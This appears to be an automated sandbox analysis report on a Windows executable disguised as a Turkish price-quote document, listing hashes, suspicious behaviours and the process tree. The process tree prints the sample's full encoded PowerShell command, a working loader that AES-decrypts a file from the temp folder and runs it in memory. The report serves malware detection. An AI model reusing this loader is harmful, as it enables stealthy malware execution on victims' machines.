Analysis
-
max time kernel
119s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
18/05/2024, 18:33
Static task
static1
Behavioral task
behavioral1
Sample
TALEP VE FİYAT TEKLİFİ FDP..exe
Resource
win7-20240221-en
General
-
Target
TALEP VE FİYAT TEKLİFİ FDP..exe
-
Size
987KB
-
MD5
4159fce548f4229d4803ce6e5e2d0707
-
SHA1
188eb1c229a8cbdde36a294ac3c2a3ac2168ff72
-
SHA256
29894553b6237d105f91a2b43be873b28ca6b0359167543d28ec35cd3e77c8c7
-
SHA512
6600e40ed00baa3ed021e0b647025fc51f2bb313af6ed7a8e0de07b26f9989c8207f2c079b9f15b18246651d142c596af7f20fb4c7b8edccc08a50b4dd23944f
-
SSDEEP
24576:IyDtH9ivKgfG9pkNem5dwYeKrHHPYSpmqF:IwdcvKc8YlQKrHHPYSEqF
Malware Config
Signatures
-
pid Process 2088 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2088 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2088 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2168 wrote to memory of 2088 2168 TALEP VE FİYAT TEKLİFİ FDP..exe 29 PID 2168 wrote to memory of 2088 2168 TALEP VE FİYAT TEKLİFİ FDP..exe 29 PID 2168 wrote to memory of 2088 2168 TALEP VE FİYAT TEKLİFİ FDP..exe 29
Processes
-
C:\Users\Admin\AppData\Local\Temp\TALEP VE FİYAT TEKLİFİ FDP..exe"C:\Users\Admin\AppData\Local\Temp\TALEP VE FİYAT TEKLİFİ FDP..exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2168 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgAMQAwADAAMAAwACkACgAKACQARQYkBkIGKgYgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABUAGUAbQBwAFAAYQB0AGgAKAApAAoAJABGBkUGSAYwBiwGIAA9ACAAJwBmAGkAbABlAC0AKgAuAHAAdQB0AGkAawAnAAoAJABFBkQGQQZfACMGLgZKBjEGIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQARQYkBkIGKgYgAC0ARgBpAGwAdABlAHIAIAAkAEYGRQZIBjAGLAYgAHwAIABTAG8AcgB0AC0ATwBiAGoAZQBjAHQAIABMAGEAcwB0AFcAcgBpAHQAZQBUAGkAbQBlACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEYAaQByAHMAdAAgADEACgAKAGYAdQBuAGMAdABpAG8AbgAgAEEGQwZfACcGRAYqBjQGQQZKBjEGIAB7AAoAIAAgACAAIABwAGEAcgBhAG0AIAAoAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGQQYqBicGLQYsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiwACgAgACAAIAAgACAAIAAgACAAWwBiAHkAdABlAFsAXQBdACQAKAZKBicGRgYnBioGCgAgACAAIAAgACkACgAKACAAIAAgACAAJABFBjQGQQYxBiAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAF0AOgA6AEMAcgBlAGEAdABlACgAKQAKACAAIAAgACAAJABFBjQGQQYxBi4ATQBvAGQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBDAGkAcABoAGUAcgBNAG8AZABlAF0AOgA6AEMAQgBDAAoAIAAgACAAIAAkAEUGNAZBBjEGLgBQAGEAZABkAGkAbgBnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAFAAYQBkAGQAaQBuAGcATQBvAGQAZQBdADoAOgBQAEsAQwBTADcACgAKACAAIAAgACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYgAD0AIAAkAEUGNAZBBjEGLgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQARQZBBioGJwYtBiwAIAAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBikACgAgACAAIAAgACQAKAZKBicGRgYnBioGXwBFBkEGQwZIBkMGKQZfACcGRAYqBjQGQQZKBjEGIAA9ACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkACgGSgYnBkYGJwYqBiwAIAAwACwAIAAkACgGSgYnBkYGJwYqBi4ATABlAG4AZwB0AGgAKQAKAAkACgAgACAAIAAgAHIAZQB0AHUAcgBuACAAJAAoBkoGJwZGBicGKgZfAEUGQQZDBkgGQwYpBl8AJwZEBioGNAZBBkoGMQYKAH0ACgAKACQARQZBBioGJwYtBiAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4ADQANwAsACAAMAB4AEEAOAAsACAAMAB4ADkANQAsACAAMAB4ADUARQAsACAAMAB4AEYAMgAsACAAMAB4AEQAQQAsACAAMAB4ADkAQQAsACAAMAB4AEEAMQAsACAAMAB4ADgAMwAsACAAMAB4ADQANwAsACAAMAB4AEEAMQAsACAAMAB4ADYARQAsACAAMAB4ADgANwAsACAAMAB4AEIANgAsACAAMAB4AEYANgAsACAAMAB4ADAARQAsACAAMAB4ADgAOAAsACAAMAB4AEMAQQAsACAAMAB4ADYAQwAsACAAMAB4ADIAQQAsACAAMAB4ADQAQwAsACAAMAB4ADAAOQAsACAAMAB4AEIARQAsACAAMAB4ADMANwAsACAAMAB4ADUAQgAsACAAMAB4AEUANgAsACAAMAB4AEMANAAsACAAMAB4ADkANAAsACAAMAB4AEUANAAsACAAMAB4AEMAOAAsACAAMAB4ADMARgAsACAAMAB4ADkANQApAAoAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeAA1ADMALAAgADAAeAA0ADMALAAgADAAeAAxAEEALAAgADAAeAA1AEUALAAgADAAeAA2ADMALAAgADAAeABGADEALAAgADAAeAAyADIALAAgADAAeAA3AEQALAAgADAAeAA3ADgALAAgADAAeABGAEMALAAgADAAeAAzADYALAAgADAAeAA3ADMALAAgADAAeAAzADIALAAgADAAeABEADYALAAgADAAeAA4ADUALAAgADAAeAAwAEQAKQAKAAoAaQBmACAAKAAkAEUGRAZBBl8AIwYuBkoGMQYgAC0AbgBlACAAJABuAHUAbABsACkAIAB7AAoAIAAgACAAIAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGIAA9ACAAJABFBkQGQQZfACMGLgZKBjEGLgBGAHUAbABsAE4AYQBtAGUACgAgACAAIAAgACQAKAYnBkoGKgYnBioGXwBFBjQGQQYxBikGIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGKQA7AAoAIAAgACAAIAAkAEUGLQYqBkgGSQZfAEUGQQZDBkgGQwZfACcGRAYqBjQGQQZKBjEGIAA9ACAAQQZDBl8AJwZEBioGNAZBBkoGMQYgAC0ARQZBBioGJwYtBiAAJABFBkEGKgYnBi0GIAAtAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiAAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAC0AKAZKBicGRgYnBioGIAAkACgGJwZKBioGJwYqBl8ARQY0BkEGMQYpBgoACgAgACAAIAAgACQAKgYsBkUGSgY5BiAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQARQYtBioGSAZJBl8ARQZBBkMGSAZDBl8AJwZEBioGNAZBBkoGMQYpACkAOwAKACAAIAAgACAAJABGBkIGNwYpBl8AJwZEBi8GLgZIBkQGIAA9ACAAJAAqBiwGRQZKBjkGLgBFAG4AdAByAHkAUABvAGkAbgB0ADsACgAgACAAIAAgACQARgZCBjcGKQZfACcGRAYvBi4GSAZEBi4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsACgB9AAoA2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2088
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
33KB
MD58998dbb6f0a43a5f64e7d688f74a3168
SHA1b10a1e9190a3955acaa25f80127f18d140d9a127
SHA256ecda43d8f11e4211b02c61572cb82269fcb8985a42b53caebeefff546253d26c
SHA512b8d13d6583a7ee357544be3b0f8c52576973cd9c18ea6b9f29978558e51e62f6fe1e8bc563f77498b4d0d9bd0ca28104687f20e73814623048169825c214c66b